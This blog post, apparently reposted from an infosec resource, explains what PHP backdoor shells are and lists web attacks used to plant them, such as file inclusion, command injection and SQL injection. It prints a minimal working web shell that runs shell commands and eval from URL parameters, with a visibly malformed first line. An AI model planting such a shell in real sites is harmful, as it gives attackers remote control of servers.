jueves, 17 de mayo de 2012

Checking Out Backdoor Shells

A backdoor shell can be a PHP, ASP, JSP, etc. piece of code which can be uploaded on a site to gain or retain access and some privileges on a website. Once uploaded, it allows the attacker to execute commands through the shell_exec () function, upload/delete/modify/download files from the web server, and many more. For defacers, it allows them to navigate easily to the directory of the public_html or /var/www and modify the index of the page.
There are ways of attacking a web application in order to plant a backdoor shell on a website. Some cases or instances are below:
  1. Local File Inclusion – a web vulnerability that allows an attacker to inject directory traversal characters on a certain website or tamper data by using a Firefox add-on User-Agent switcher and spawn a shell.
  2. Remote Code Execution or Command Injection – can be achieved if a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the website’s hosting server.
  3. Structured Query Language Injection or SQLI – after the attacker gets the username and password of the website administrator, he or she could use that privilege to access the website admin panel and could possibly upload a backdoor shell using nullbyte injection on the image upload page.
  4. Sniffing
  5. Bruteforce Attacks – if possible attacks just cannot be done, then attackers may bruteforce the File Transfer Protocol or SSH Logins to get in the web server.
  6. Cross Site Scripting – if a user can can send requests and get responses from the victim, then it’s possible to backdoor a page.
  7. Social Engineering
  8. Remote File Inclusion

In this write-up, we will be talking about PHP backdoor shells since most websites are coded in PHP. Below is a simple PHP code that is very popular and is scattered all over the web (http://stackoverflow.com/questions/3115559/exploitable-php-functions; http://shipcodex.blogspot.com/2012/01/simple-php-backdoor-shell.html).
This code allows an attacker to execute *nix commands (command execution/injection):

   if(isset($_GET['shell'])) echo("
".shell_exec($_GET['shell']." &")."
   if(isset($_GET['php'])) echo(eval(stripcslashes($_GET['php'])));
   if(isset($_GET['echo'])) echo($_GET['echo']);


Fuente: resources.infosecinstitute.com/


No hay comentarios: